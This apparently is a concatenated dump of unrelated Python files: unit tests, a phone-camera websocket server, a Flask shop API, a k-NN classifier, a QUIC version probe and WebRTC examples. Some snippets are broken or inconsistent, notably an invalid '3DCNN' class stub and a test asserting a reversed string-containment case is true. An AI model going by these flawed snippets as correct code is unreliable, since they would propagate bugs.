from survey import AnonymousSurvey
class TestAnonymousSurvey(unittest.TestCase):
"""针对AnonymousSurvey类的测试"""
def setUp(self):
""" 创建一个调查对象和一组答案,供使用的测试方法使用 """
question = "你最初学的语言是什么?"
self.my_survey = AnonymousSurvey(question)
self.responses = ['English', 'Spanish', 'Mandarin']
def test_store_single_response(self):
"""测试单个答案会被妥善地存储"""
self.my_survey.store_response(self.responses[0])
self.assertIn(self.responses[0], self.my_survey.responses)
def test_store_three_responses(self):
"""测试三个答案会被妥善地存储"""
for response in self.responses:
self.my_survey.store_response(response)
for response in self.responses:
self.assertIn(response, self.my_survey.responses)
unittest.main()
|
991,177 | 37efbd2c17fd4ddf52d14c517605c062255d3aa0 | import unittest
from IsInSolution import IsIn
class TestIsInSolution(unittest.TestCase):
def test_IsIn(self):
"""
Test string1 is in string2
"""
string1 = "Hello"
string2 = "Hello World!"
result = IsIn(string1,string2)
# Test a list of whole numbers
self.assertEqual(result, True)
"""
Test string1 is in string2
"""
string2 = "Hello"
string1 = "Hello World!"
result = IsIn(string1,string2)
# Test a list of whole numbers
self.assertEqual(result, True)
# This is known as a command line entry point
if __name__ == '__main__':
unittest.main()
# Another way to test on the commandline is to call the following command
# which runs unittest test on the test module.
# $ python -m unittest test
# $ python -m unittest -v test (verbose)
# $ python -m unittest discover (tests any file in the folder matching test*.py)
# This allows you to test all the test files in the tests folder
# $ python -m unittest discover -s tests
# lastly if the source code you are testing is not in the root directory but is
# contained in a subdirectory for example a folder like src/ you can tell
# unittest where to execute the test so that it can import the modules correctly
# with the -t flag
# $ python -m unittest discover -s tests -t src
|
991,178 | 34cee1bb79aba70b540bf3f03d0c1c01223f180c | import asyncio
from http import HTTPStatus
from http.client import HTTPResponse
from pathlib import Path
from urllib.request import urlopen
from typing import Any, ContextManager, Optional, Union, Tuple, cast
from typing_extensions import Literal
import json
import socket
from threading import Thread
from queue import Queue
import ssl
import subprocess
import pyqrcode # type: ignore
import struct
import logging
import websockets
try: # WebSocketException is not defined for ver<8 of websockets lib
from websockets.exceptions import WebSocketException
except ImportError:
WebSocketException = Exception
from websockets.http import Headers
from websockets.server import WebSocketServerProtocol
import numpy as np # type: ignore
from urllib.error import URLError
def drop_alpha_channel(img: np.ndarray):
return img if img.shape[2] == 3 else img[:, :, :3]
# try cv2 -> matplotlib -> Pillow
try:
import cv2 # type: ignore
def imdecode(buf: bytes) -> np.ndarray: # type: ignore
img: np.ndarray = cv2.imdecode(np.frombuffer(buf, dtype=np.uint8), cv2.IMREAD_COLOR) # type: ignore # nopep8
img = drop_alpha_channel(img)
return img
except ImportError:
try:
from matplotlib.pyplot import imread
from io import BytesIO
# pretty sure matplotlib just uses PIL under the hood, oh well:
def imdecode(buf: bytes) -> np.ndarray: # type: ignore
img = drop_alpha_channel(imread(BytesIO(buf)))
# RGB2BGR
return np.flip(img, axis=2) # type: ignore
except ImportError:
from PIL import Image
from io import BytesIO
def imdecode(buf: bytes) -> np.ndarray:
img = np.array(Image.open(BytesIO(buf))) # type: ignore
img = drop_alpha_channel(img)
# RGB2BGR
return np.flip(img, axis=2) # type: ignore
class ImuDataFrame:
unix_timestamp: float
quaternion: Tuple[float, float, float, float]
accelerometer: Optional[Tuple[float, float, float]]
gyroscope: Optional[Tuple[float, float, float]]
magnetometer: Optional[Tuple[float, float, float]]
class ClientDisconnect(Exception):
pass
class DataUnavailable(Exception):
pass
class PhoneSensor(ContextManager['PhoneSensor']):
def __init__(self,
*,
qrcode: bool = False,
host: str = "0.0.0.0",
port: int = 8000,
logger: logging.Logger = logging.getLogger(
'mvt.phone_sensor'),
log_level: int = logging.WARN,
proxy_client_from: Optional[str] = None):
"""Initialize a `PhoneSensor` object
:param qrcode: True to output a QRCode in the terminal window that points to the server accessible via LAN, defaults to False
:param host: Which hostname/ip to host the server on, defaults to "0.0.0.0"
:param port: Which port to host the server on, defaults to 8000
:param logger: A standard `logging.Logger` for debugging and general log information, defaults to logging.getLogger('mvt.phone_sensor')
:param log_level: Log level for the aforementioned logger, defaults to logging.WARN
:param proxy_client_from: A separate host from which to proxy the web client, defaults to None.
Mainly for development purposes, using a hot-reloaded webpack server for the client
rather than the one shipped with your `pip install`
"""
self._ws: Optional[websockets.WebSocketServerProtocol] = None
self._out: Queue[Union[websockets.Data, ClientDisconnect]] = Queue()
self._waiting = False
self._qrcode = qrcode
self._proxy_client_from = proxy_client_from
self.logger = logger
self.logger.setLevel(log_level)
self.client_connected = False
self.loop = asyncio.new_event_loop()
self._in: asyncio.Queue[str] = asyncio.Queue(loop=self.loop)
self.stop_flag = self.loop.create_future()
self.server_thread = Thread(target=self._start_server,
kwargs={'host': host, 'port': port},
daemon=True)
self.server_thread.start()
assert self._out.get() == 'ready', "server failed to start"
def __exit__(self, _1, _2, _3):
self.close()
def grab(self,
cam: Literal['front', 'back'] = 'back',
*,
resolution: Tuple[int, int] = (640, 480),
button: bool = False,
wait: Optional[float] = None,
encoding: Literal['jpeg', 'png', 'webp', 'bmp'] = 'webp',
quality: int = 90,
) -> Tuple[np.ndarray, float]:
"""Grab an image from the first/currently connected webapp client
:param cam: Default camera to use, defaults to 'back'.
Most smartphones have a 'front' (the side with the touchscreen) and a 'back' camera.
This may be temporarily overridden through the menu on the client.
:param resolution: The desired resolution (width, height) of the photo, defaults to (640, 480).
Choosing lower values will increase performance, allowing you to take more photos in quicker succession.
Note this is not necessarily respected - It's up to the browser's implementation which resolution
it chooses, with this value being the 'ideal'. For example, if you ask for (999999, 480)
the browser might choose (640, 480) instead.
:param button: True to wait for button press, defaults to False.
:param wait: Minimum amount of time to wait since previous photo before taking a new one, defaults to None.
Incompatible with the `button` arg.
:param encoding: The encoding mimetype for the image, defaults to 'webp'.
In order of most to least performance, the recommended options are: ['webp', 'jpeg', 'png', 'bmp'].
'webp' and 'jpeg' are lossy compressions, so they will have differing compression artifacts.
'png' and 'bmp' are lossless. 'bmp' is essentially "no encoding" so you may use this if
network is not a bottleneck (which it typically is). Otherwise 'png' is also lossless.
:param quality: The quality (within (0, 100]) at which to encode the image, defaults to 90.
Lower may slightly increase performance at the cost of image quality, however,
the effect is typically insignificant. Does nothing for lossless encodings such as 'png'.
:raises PhoneSensor.ClientDisconnect: If the device disconnects from the app after receiving the command.
:return: An `(img, timestamp)` tuple,
where `img` is a `numpy.ndarray` in the format you would expect from OpenCV (h x w x rgb)
and `timestamp` is a unix timestamp from the client device (seconds since epoch)
"""
assert not (wait is not None and button), \
"`wait` argument cannot be used with `button=True`"
assert 0 <= quality <= 90
data = self._rpc(json.dumps({
'cmd': 'grab',
'frontFacing': cam == 'front',
'button': button,
'wait': wait,
'resolution': resolution,
'encoding': encoding,
'quality': quality
}))
assert isinstance(data, bytes)
# first 4 bytes is the timestamp, followed by the encoded image data
timestamp: float = struct.unpack('Q', data[:8])[0] / 1000.0
img = imdecode(data[8:])
# old format without encoding; TODO: make this an option to this function
# width, height = struct.unpack('<HH', data[24:28])
# datahape the data and omit the unfortunate alpha channel
# img = np.frombuffer( # type: ignore
# data[28:],
# dtype=np.uint8
# ).reshape((height, width, 4))[:, :, :3] # unsure whether this is faster/slower than delete. think so
return img, timestamp
def imu(self, wait: Optional[float] = None) -> ImuDataFrame: # type: ignore
"""Retrieve orientation and motion data from a capable device.
:param wait: Minimum amount of time to wait since previous reading before taking a new one, defaults to None.
:raises PhoneSensor.ClientDisconnect: If the device disconnects from the app after receiving the command.
:raises PhoneSensor.DataUnavailable: if the device is incapable of providing the data (eg. desktop pc),
or if the browser disallows it, either due to app permissions or if it does not support the features.
:return: An ImuDataFrame, with the orientation as a quaternion tuply and raw accelerometer, magnetometer and
gyroscope tuples if supported by the browser (generally only new versions of Android Chrome).
Also includes the timestamp (seconds since epoch) at which the last quaternion reading was made.
"""
resp = json.loads(self._rpc(json.dumps({
'cmd': 'imu',
'wait': wait
})))
if 'error' in resp:
raise DataUnavailable(resp['error'])
frame = ImuDataFrame()
frame.unix_timestamp = resp['unixTimestamp']
frame.quaternion = tuple(resp['quaternion'])
for reading in ['accelerometer', 'gyroscope', 'magnetometer']:
setattr(frame, reading, tuple(
resp[reading]) if reading in resp else None)
return frame
def close(self):
"""Close the server and relinquish control of the port.
Use of `PhoneSensor` as a context manager is preferred to this, where suitable.
May be called automatically by the garbage collector.
"""
self.loop.call_soon_threadsafe(self.stop_flag.set_result, True)
self.server_thread.join()
def _rpc(self, cmd: str):
self._waiting = True
asyncio.run_coroutine_threadsafe(self._in.put(cmd), self.loop)
res = self._out.get()
self._waiting = False
if isinstance(res, ClientDisconnect):
raise res
return res
def _start_server(self, host: str, port: int):
async def _websocket_server():
# TODO: graceful shutdown https://stackoverflow.com/a/48825733/1266662
async with websockets.serve(self._api, host=host, port=port,
# just generate a new certificate every time.
# Hopefully this doesnt drain too much entropy
ssl=_use_selfsigned_ssl_cert(),
# allow for big images to be sent (<100MB)
max_size=100_000_000,
process_request=self._maybe_serve_static):
self._out.put("ready")
await self.stop_flag
url = f"https://{self._get_local_ip()}:{port}"
# display cmdline connect msg
BLUE = '\033[94m'
UNDERLINE = '\033[4m'
END = '\033[0m'
print(f"Hosting 📷 app at 🌐 {BLUE}{UNDERLINE}{url}{END}{END}")
# cmdline qr code if specified
if self._qrcode:
# use url.upper() as it's needed for alphanumeric encoding:
# https://pythonhosted.org/PyQRCode/encoding.html#alphanumeric
qrcode = pyqrcode.create(url.upper()).terminal() # type: ignore
print(f'Or scan the following QR Code: {qrcode}')
self.loop.run_until_complete(_websocket_server())
async def _api(self, ws: WebSocketServerProtocol, path: str):
ip = ws.local_address[0]
self.logger.info(f"New client connected from {ip}")
self.client_connected = True
# # handle webpack reload ws proxy
# if path == '/sockjs-node' and self._proxy_client_from:
# # import pdb; pdb.set_trace()
# await self._ws_proxy(
# await websockets.connect('ws://' + self._proxy_client_from + path, loop=self.loop),
# ws)
# return
# new connection
if self._ws: # if we already have one,
try:
await self._ws.send(json.dumps({
'cmd': 'disconnect'
}))
except WebSocketException:
pass
if self._waiting:
self._out.put(ClientDisconnect(
"Switched to new client before retrieving result from previous one."))
self._ws = ws
async def request_response():
cmd = await self._in.get()
await ws.send(cmd)
res = await ws.recv()
self._out.put(res)
try:
while True:
req_res = self.loop.create_task(request_response())
_, pending = await asyncio.wait({req_res, self.stop_flag},
return_when=asyncio.FIRST_COMPLETED)
if req_res in pending:
# stop_flag mustve been set
req_res.cancel()
break
except WebSocketException as e:
self.client_connected = False
self._out.put(ClientDisconnect(f"Client from {ip} disconnected:"))
raise e
# for proxying the webpack websocket to the webpack dev server
# Doesn't seem to work :(
# async def _ws_proxy(self, from_: WebSocketClientProtocol, to: WebSocketServerProtocol):
# while True:
# upstream, downstream = asyncio.ensure_future(from_.recv()), asyncio.ensure_future(to.recv())
# # AssertionError: yield from wasn't used with future
# # Task exception was never retrieved
# done, _ = asyncio.wait(
# { upstream, downstream },
# return_when=asyncio.FIRST_COMPLETED)
# if upstream in done:
# await to.send(await upstream)
# if downstream in done:
# await from_.send(await downstream)
async def _maybe_serve_static(self, path: str, _: Headers):
# stolen from stackoverflow - lost link
_extensions_map = {
'.manifest': 'text/cache-manifest',
'.html': 'text/html',
'.png': 'image/png',
'.jpg': 'image/jpg',
'.svg': 'image/svg+xml',
'.css': 'text/css',
'.js': 'application/x-javascript',
'': 'application/octet-stream', # Default
}
if path == '/sockjs-node':
return HTTPStatus.NOT_FOUND, cast(Any, {}), b''
if path != '/ws': # and path != '/sockjs-node':
if path == '/':
path = '/index.html'
if self._proxy_client_from:
url = 'http://' + self._proxy_client_from + path
self.logger.info('proxying client from ' + url)
try:
res: HTTPResponse = urlopen(url)
return (HTTPStatus.OK, {
'Content-Type': res.headers.get('Content-Type')
}, res.read())
except URLError:
self._out.put(ClientDisconnect(
"Could not proxy to %s. Is the server specified by `proxy_client_from` running?" % url))
return HTTPStatus.NOT_FOUND, cast(Any, {}), b''
else:
file = Path(__file__).parent / ('js_client' + path)
return (HTTPStatus.OK, {
'Content-Type': _extensions_map[file.suffix]
}, file.read_bytes())
# if None is returned, will default to ws handler
return None
def _get_local_ip(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# doesn't even have to be reachable
s.connect(('10.255.255.255', 1))
ip = s.getsockname()[0]
except Exception:
YELLOW = '\033[93m'
END = '\033[0m'
self.logger.warn(
f"{YELLOW}[WARN]: Couldn't find a local IP. Are you connected to a LAN? Falling back to loopback address{END}")
ip = '127.0.0.1'
finally:
s.close()
return ip
ClientDisconnect = ClientDisconnect
DataUnavailable = DataUnavailable
ImuDataFrame = ImuDataFrame
# Adapted from https://docs.python.org/3/library/ssl.html#self-signed-certificates
def _use_selfsigned_ssl_cert():
# Generation probably isn't required.
# Reusing the same one is fine as they only need be unique for each domain name
# which is n/a for us as we use IP addresses
certfile = Path(__file__).parent / 'ssl-cert.pem'
# if not certfile.exists():
# subprocess.check_call(
# 'openssl req -new -x509 -days 365 -nodes \
# -out {0} \
# -keyout {0} \
# -subj "/C=RO/ST=Bucharest/L=Bucharest/O=IT/CN=*"'
# .format(certfile), shell=True, stderr=subprocess.DEVNULL)
# keyfile not needed
# with NamedTemporaryFile('r') as key_file:
# key_file.write(crypto.dump_privatekey(crypto.FILETYPE_PEM, k).decode("utf-8"))
ssl_context: Any = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER) # type: ignore
ssl_context.load_cert_chain(certfile) # type: ignore
return ssl_context
|
991,179 | 88afdb99029f7abfce9ddd4a13bf80d6f10541ae | from Models import ShopModel, db, shop_fields, RoomModel
from flask import Flask
from flask_restful import Api, Resource, reqparse, abort,fields, marshal_with
from flask_sqlalchemy import SQLAlchemy
Shop_Parser = reqparse.RequestParser()
Shop_Parser.add_argument("shop_id",type=int, help="Shop id", required=True)
Shop_Parser.add_argument("name", type=str, help="Shop name", required=True)
Shop_Parser.add_argument("industry",type=str, help="industry", required=True)
Shop_Parser.add_argument("room_id",type=int, help="industry", required=True)
Shop_Updater=reqparse.RequestParser()
Shop_Updater.add_argument("shop_id",type=int, help="Shop id")
Shop_Updater.add_argument("name", type=str, help="Shop name")
Shop_Updater.add_argument("industry",type=str, help="industry")
class Shop(Resource):
@marshal_with(shop_fields)
def get(self, shop_id):
result= ShopModel.query.filter_by(shop_id=shop_id).first()
if not result:
abort (404, message= "Shop is not in the data base")
return result, 200
@marshal_with(shop_fields)
def post(self, shop_id):
result = ShopModel.query.filter_by(shop_id=shop_id).first()
if result:
abort (406, message="Shop is already in database")
args=Shop_Parser.parse_args()
result=ShopModel(shop_id=shop_id, name=args['name'], industry=args['industry'], room_id=args['room_id'])
room=RoomModel.query.filter_by(room_id=args['room_id']).first()
if not room or room.debt!=0:
abort( 406, message="This room is unavailable")
updatedRoom = RoomModel(room_id=room.room_id, rent=room.rent, debt=0)
RoomModel.query.filter_by(room_id=updatedRoom.room_id).delete()
db.session.commit()
db.session.add(updatedRoom)
db.session.commit()
db.session.add(result)
db.session.commit()
return args, 201
@marshal_with(shop_fields)
def put(self, shop_id):
result = ShopModel.query.filter_by(shop_id=shop_id).first()
args = Shop_Parser.parse_args()
if result:
result.name=args['name']
result.industry=args['industry']
else:
room = RoomModel.query.filter_by(room_id=args['room_id']).first()
if not room or room.debt != 0:
abort(406, message="This room is unavailable")
updatedRoom = RoomModel(room_id=room.room_id, rent=room.rent, debt=0)
RoomModel.query.filter_by(room_id=updatedRoom.room_id).delete()
db.session.commit()
db.session.add(updatedRoom)
db.session.commit()
result = ShopModel(shop_id=shop_id, name=args['name'], industry=args['industry'],room_id=args['room_id'])
db.session.add(result)
db.session.commit()
return args, 201
@marshal_with(shop_fields)
def delete(self, shop_id):
ShopModel.query.filter_by(shop_id=shop_id).delete()
db.session.commit()
return 200
|
991,180 | 5cc8a32fea689d0f2de115f82e409483f2dfac19 | #!/usr/bin/env python
# encoding: utf-8
"""
3DCNN网络用于结节分类
"""
class 3DCNN(object):
def __init__(self):
print 123
def last(self):
|
991,181 | 0388bdde4f3c593c63b2c4f7383b8e236bed6bd8 | import sys
import asyncio
import random
from quic_version_detector import quic, net, cli
def dummy_version_packet() -> bytes:
"""Constructs a packet with a dummy version.
Such packet makes the server return "Version Negotation Packet".
Returns:
quic.Packet
"""
connection_id = bytes([random.getrandbits(8) for _ in range(8)])
public_flags=bytes.fromhex('09')
version=bytes.fromhex('51303938')
return public_flags + \
connection_id + version + bytes.fromhex('01') + bytes.fromhex('fc4f300aed46601eec8f0088a001040043484c4f11000000')
def print_results(
host: str, port: int,
version_negotiation_packet: quic.VersionNegotationPacket) -> None:
"""Prints retrieved results.
Args:
host: queried hostname.
port: queried port.
version_negotation_packet: received packet.
"""
print('{}'.format(host), end='')
for version in version_negotiation_packet.supported_versions:
print(',{}'.format(version), end='')
print()
class UdpHandler:
query_count = 1
def __init__(self, target_hostname: str, target_port: int) -> None:
self.target_hostname = target_hostname
self.target_port = target_port
def connection_made(self, transport) -> None:
self.transport = transport
for _ in range(self.query_count):
self.transport.sendto(dummy_version_packet())
def datagram_received(self, data, addr) -> None:
print_results(
self.target_hostname,
self.target_port,
quic.parse_response(data),
)
self.transport.close()
def error_received(self, transport) -> None:
print('{},Error received:{}'.format(self.target_hostname, transport))
self.transport.close()
def connection_lost(self, transport) -> None:
loop = asyncio.get_event_loop()
loop.stop()
def stop_event_loop(target_hostname, event_loop, timeout: float) -> None:
"""Terminates event loop after the specified timeout."""
def timeout_handler():
event_loop.stop()
print('{},None'.format(target_hostname))
event_loop.call_later(timeout, timeout_handler)
def main() -> None:
"""Main entry point."""
args = cli.parse_args(sys.argv[1:])
server_addr = net.resolve_hostname(args.host)
event_loop = asyncio.get_event_loop()
connect = event_loop.create_datagram_endpoint(
lambda: UdpHandler(args.host, args.port),
remote_addr=(server_addr, args.port)
)
event_loop.run_until_complete(connect)
stop_event_loop(args.host, event_loop, 5)
event_loop.run_forever()
if __name__ == '__main__':
main()
|
991,182 | ad4327ce9860c8d2de2015f087e9c181e277e214 |
from sqlalchemy import create_engine
from sqlalchemy.orm import Session
from WateringApp.Fachwerte.URI import URI
from WateringApp.config import DB_BASE_URI, DB_NAME, DB_USERNAME, DB_PASSWORD, SQLALCHEMY_DATABASE_URI
from WateringApp.extensions import db, metadata
# uri = URI(DB_BASE_URI, DB_NAME, DB_USERNAME, DB_PASSWORD)
# uri = uri.get_uri_string()
engine = create_engine(SQLALCHEMY_DATABASE_URI)
session = Session(engine)
|
991,183 | ed752757eb5024eab737517477a3e7bcb832af39 | from setuptools import setup, find_packages
setup(
name="collaps-layout",
version="0.1",
packages=find_packages(),
install_requires=['d3-primeri>=0.1'],
entry_points = {
'kod.vizualizator':
['collaps_layout_kod=collaps_layout_vizualizator.collaps_kod.collaps_layout_kod:CollapsLayout'],
},
zip_safe=True
) |
991,184 | 0d2a2d3f10cded14500d2b5931a2377f4d7049e2 | '''
Question 2.1 Skeleton Code
Here you should implement and evaluate the k-NN classifier.
'''
import data
import numpy as np
# Import pyplot - plt.imshow is useful!
import matplotlib.pyplot as plt
from sklearn.model_selection import KFold
class KNearestNeighbor(object):
'''
K Nearest Neighbor classifier
'''
def __init__(self, train_data, train_labels):
self.train_data = train_data
self.train_norm = (self.train_data**2).sum(axis=1).reshape(-1,1)
self.train_labels = train_labels
def l2_distance(self, test_point):
'''
Compute L2 distance between test point and each training point
Input: test_point is a 1d numpy array
Output: dist is a numpy array containing the distances between the test point and each training point
'''
# Process test point shape
test_point = np.squeeze(test_point)
if test_point.ndim == 1:
test_point = test_point.reshape(1, -1)
assert test_point.shape[1] == self.train_data.shape[1]
# Compute squared distance
test_norm = (test_point**2).sum(axis=1).reshape(1,-1)
dist = self.train_norm + test_norm - 2*self.train_data.dot(test_point.transpose())
return np.squeeze(dist)
def query_knn(self, test_point, k):
'''
Query a single test point using the k-NN algorithm
You should return the digit label provided by the algorithm
'''
distance_test_and_training = self.l2_distance(test_point)
k_smallest_index = distance_test_and_training.argsort()[:k]
# k_nearest_neighbor = self.train_labels[k_smallest_index]
# digit = float(np.argmax(np.bincount(k_nearest_neighbor.astype(int))))
k_nearest_neighbor_distance = distance_test_and_training[k_smallest_index]
k_nearest_neighbor_label = self.train_labels[k_smallest_index]
occurence_count = np.bincount(k_nearest_neighbor_label.astype(int))
same_number_occurence_labels = np.argwhere(occurence_count == np.amax(occurence_count))
# all_labels = np.unique(k_nearest_neighbor_label)
mean_list = []
for i in same_number_occurence_labels:
# x = np.where(k_nearest_neighbor_label == i)
# y = k_nearest_neighbor_distance[x]
# z = np.mean(y)
mean_list.append(np.mean(k_nearest_neighbor_distance[np.where(k_nearest_neighbor_label == float(i))]))
digit = float(same_number_occurence_labels[mean_list.index(min(mean_list))])
# print(distance_test_and_training[k_smallest_index])
return digit
def cross_validation(train_data, train_labels, k_range=np.arange(1,16)):
'''
Perform 10-fold cross validation to find the best value for k
Note: Previously this function took knn as an argument instead of train_data,train_labels.
The intention was for students to take the training data from the knn object - this should be clearer
from the new function signature.
'''
kf = KFold(n_splits=10)
accuracy_rate_per_k = []
for k in k_range:
accuracy_rate_across_folds = []
# Loop over folds
for train_index, validation_index in kf.split(train_data):
accuracy_result_from_validation_set = []
knn = KNearestNeighbor(train_data[train_index], train_labels[train_index])
for i in validation_index:
validation_point = train_data[i]
validation_point_label = train_labels[i]
digit = knn.query_knn(validation_point, k)
accuracy_result_from_validation_set.append(1 if digit==validation_point_label else 0)
accuracy_rate_across_folds.append(sum(accuracy_result_from_validation_set)/validation_index.shape[0])
avg_accuracy_rate = sum(accuracy_rate_across_folds)/len(accuracy_rate_across_folds)
print("Runing: k = " + str(k) +", the average accuracy rate is: " + str(avg_accuracy_rate))
accuracy_rate_per_k.append(avg_accuracy_rate)
optimal_k = np.argmax(accuracy_rate_per_k) + 1
return optimal_k, accuracy_rate_per_k[optimal_k - 1]
# Evaluate k-NN
# ...
def classification_accuracy(knn, k, eval_data, eval_labels):
'''
Evaluate the classification accuracy of knn on the given 'eval_data'
using the labels
'''
count = 0
for i in range(eval_data.shape[0]):
predicted_label = knn.query_knn(eval_data[i], k)
if predicted_label == eval_labels[i]:
count += 1
return count/eval_data.shape[0]
def main():
train_data, train_labels, test_data, test_labels = data.load_all_data('data')
knn = KNearestNeighbor(train_data, train_labels)
# # Example usage:
accuracy_for_train_data = []
accuracy_for_test_data = []
for k in [1,15]:
accuracy_for_train_data.append(classification_accuracy(knn, k, train_data, train_labels))
accuracy_for_test_data.append(classification_accuracy(knn, k, test_data, test_labels))
print("For K = 1," +
"\nThe train classification accuracy is: " + str(accuracy_for_train_data[0]) +
"\nThe test classification accuracy is: " + str(accuracy_for_test_data[0]) + "\n")
print("For K = 15," +
"\nThe train classification accuracy is: " + str(accuracy_for_train_data[1]) +
"\nThe test classification accuracy is: " + str(accuracy_for_test_data[1]) + "\n")
optimal_k, accuracy_rate = cross_validation(train_data, train_labels)
accuracy_for_train_data.append(classification_accuracy(knn, optimal_k, train_data, train_labels))
accuracy_for_test_data.append(classification_accuracy(knn, optimal_k, test_data, test_labels))
print("\nThe optimal K is: " + str(optimal_k) +
"\nThe train classification accuracy is: " + str(accuracy_for_train_data[2]) +
"\nThe average accuracy across folds is: " + str(accuracy_rate) +
"\nThe test classification accuracy is: " + str(accuracy_for_test_data[2]))
if __name__ == '__main__':
main() |
991,185 | af4f84e355de6ac64c8c6cd7146730ffb168ebbd | import flask as f
import sqlalchemy as s
from sqlalchemy.dialects import postgresql
from ..entities._entity import (
Base,
EntityMixin,
EntitySerializer,
NotNull,
generate_uuid,
)
class Context(Base, EntityMixin):
__tablename__ = "context"
id = NotNull(s.String(50), primary_key=True, default=generate_uuid)
tags = NotNull(postgresql.JSONB)
s.Index("context_index", Context.tags, unique=True)
class _Serializer(EntitySerializer):
def _dump(self, context):
result = {
"id": context.id,
"links": {
"list": f.url_for("api.contexts", _external=True),
"self": f.url_for("api.context", context_id=context.id, _external=True),
},
}
result.update(context.tags)
return result
class ContextSerializer:
one = _Serializer()
many = _Serializer(many=True)
|
991,186 | f893bfbe7d2ded56f201afcafb0ae12c97ddcff7 | from itertools import product
import numpy as np
import geometry
import text
def try_merge_point_groups(img, point_groups):
bounds = list(reversed(img.img.shape[:2]))
point_groups = set(point_groups)
while True:
done = True
# iterate every pair of possible point groups
for group1 in list(iter(point_groups)):
if group1 not in point_groups:
continue
for group2 in list(iter(point_groups)):
if group1 is group2 or group2 not in point_groups:
continue
# measure similarity between two groups of points
# and merge them together if it passes the test
if not _point_groups_are_similar(group1, group2, bounds):
continue
point_groups.remove(group1)
point_groups.remove(group2)
group = _merge_two_point_groups(group1, group2)
point_groups.add(group)
group1 = group
done = False
if done:
break
return list(point_groups)
def _point_groups_are_similar(group1, group2, bounds, threshold=geometry.deg_to_rad(15)):
# measure the nearest distance between the two point groups
distance1 = geometry.manhattan(group1.start, group2.start)
distance2 = geometry.manhattan(group1.start, group2.stop)
distance3 = geometry.manhattan(group1.stop, group2.start)
distance4 = geometry.manhattan(group1.stop, group2.stop)
# reject them if they are too far apart
bad_distance = 50
too_far = all([
distance1 > bad_distance,
distance2 > bad_distance,
distance3 > bad_distance,
distance4 > bad_distance,
])
if too_far:
return False
# fit a line to each point group
xs1, ys1 = group1.xs, group1.ys
m1, b1 = geometry.Line.compute_model(xs1, ys1)
xs2, ys2 = group2.xs, group2.ys
m2, b2 = geometry.Line.compute_model(xs2, ys2)
xs = [
min(group1.start.x, group2.start.x),
max(group1.stop.x, group2.stop.x),
]
# reject them if the slopes and y-intercepts are too far apart
for x in xs:
y1 = m1 * x + b1
y2 = m2 * x + b2
dy = abs(y1 - y2)
if dy >= 5:
return False
# fit a line to the merged point group
m, b = geometry.Line.compute_model(xs1 + xs2, ys1 + ys2)
# reject if the fitted line is too different from either of the
# original point groups
if m1 - threshold > m or m1 + threshold < m:
return False
if m2 - threshold > m or m2 + threshold < m:
return False
return True
def _merge_two_point_groups(group1, group2):
group = geometry.GradientPointGroup()
for point in group1:
group.add(point, group1.direction)
for point in group2:
group.add(point, group2.direction)
return group
def try_merge_words(words):
words = set(words)
while True:
done = True
# iterate every pair of possible words
for w1 in list(iter(words)):
if w1 not in words:
continue
for w2 in list(iter(words)):
if w1 is w2 or w2 not in words:
continue
# if the bounding boxes of the words are physically
# too far apart
if not _words_are_close(w1, w2):
continue
words.remove(w1)
words.remove(w2)
word = _merge_two_words(w1, w2)
words.add(word)
w1 = word
done = False
if done:
break
return [word for word in words if word.area >= 250]
def _overlap(w1, w2):
if w1.min_x > w2.max_x or w2.min_x > w1.max_x:
return False
if w1.min_y > w2.max_y or w2.min_y > w1.max_y:
return False
return True
def _words_are_close(w1, w2, threshold_x=7, threshold_y=15):
# overlapping bounding boxes means we should merge
if _overlap(w1, w2):
return True
w1x = [w1.min_x, w1.max_x]
w1y = [w1.min_y, w1.max_y]
w2x = [w2.min_x, w2.max_x]
w2y = [w2.min_y, w2.max_y]
dx = float('inf')
dy = float('inf')
# if they arent too far offset from each other
for x1, y1, x2, y2 in product(w1x, w1y, w2x, w2y):
dx = min(dx, abs(x1 - x2))
dy = min(dy, abs(y1 - y2))
return dx < threshold_x and dy < threshold_y
def _merge_two_words(w1, w2):
word = text.Word(w1.img)
word.add(w1.top_left)
word.add(w1.bottom_right)
word.add(w2.top_left)
word.add(w2.bottom_right)
return word
|
991,187 | de91182c00e0f4ec7d148649dbc646a3bca2c2b6 | import argparse
import asyncio
import logging
import time
from aiortc import RTCIceCandidate, RTCPeerConnection, RTCSessionDescription
from aiortc.contrib.signaling import BYE, add_signaling_arguments, create_signaling
def channel_log(channel, t, message):
print("channel(%s) %s %s" % (channel.label, t, message))
def channel_send(channel, message):
channel_log(channel, ">", message)
channel.send(message)
async def consume_signaling(pc, signaling):
while True:
obj = await signaling.receive()
if isinstance(obj, RTCSessionDescription):
await pc.setRemoteDescription(obj)
if obj.type == "offer":
# send answer
await pc.setLocalDescription(await pc.createAnswer())
await signaling.send(pc.localDescription)
elif isinstance(obj, RTCIceCandidate):
await pc.addIceCandidate(obj)
elif obj is BYE:
print("Exiting")
break
time_start = None
def current_stamp():
global time_start
if time_start is None:
time_start = time.time()
return 0
else:
return int((time.time() - time_start) * 1000000)
async def run_answer(pc, signaling):
await signaling.connect()
@pc.on("datachannel")
def on_datachannel(channel):
channel_log(channel, "-", "created by remote party")
@channel.on("message")
def on_message(message):
channel_log(channel, "<", message)
if isinstance(message, str) and message.startswith("ping"):
# reply
channel_send(channel, "pong" + message[4:])
await consume_signaling(pc, signaling)
async def run_offer(pc, signaling):
await signaling.connect()
channel = pc.createDataChannel("chat")
channel_log(channel, "-", "created by local party")
async def send_pings():
while True:
channel_send(channel, "ping %d" % current_stamp())
await asyncio.sleep(1)
@channel.on("open")
def on_open():
asyncio.ensure_future(send_pings())
@channel.on("message")
def on_message(message):
channel_log(channel, "<", message)
if isinstance(message, str) and message.startswith("pong"):
elapsed_ms = (current_stamp() - int(message[5:])) / 1000
print(" RTT %.2f ms" % elapsed_ms)
# send offer
await pc.setLocalDescription(await pc.createOffer())
await signaling.send(pc.localDescription)
await consume_signaling(pc, signaling)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Data channels ping/pong")
parser.add_argument("role", choices=["offer", "answer"])
parser.add_argument("--verbose", "-v", action="count")
add_signaling_arguments(parser)
args = parser.parse_args()
if args.verbose:
logging.basicConfig(level=logging.DEBUG)
signaling = create_signaling(args)
pc = RTCPeerConnection()
if args.role == "offer":
coro = run_offer(pc, signaling)
else:
coro = run_answer(pc, signaling)
# run event loop
loop = asyncio.get_event_loop()
try:
loop.run_until_complete(coro)
except KeyboardInterrupt:
pass
finally:
loop.run_until_complete(pc.close())
loop.run_until_complete(signaling.close())
|
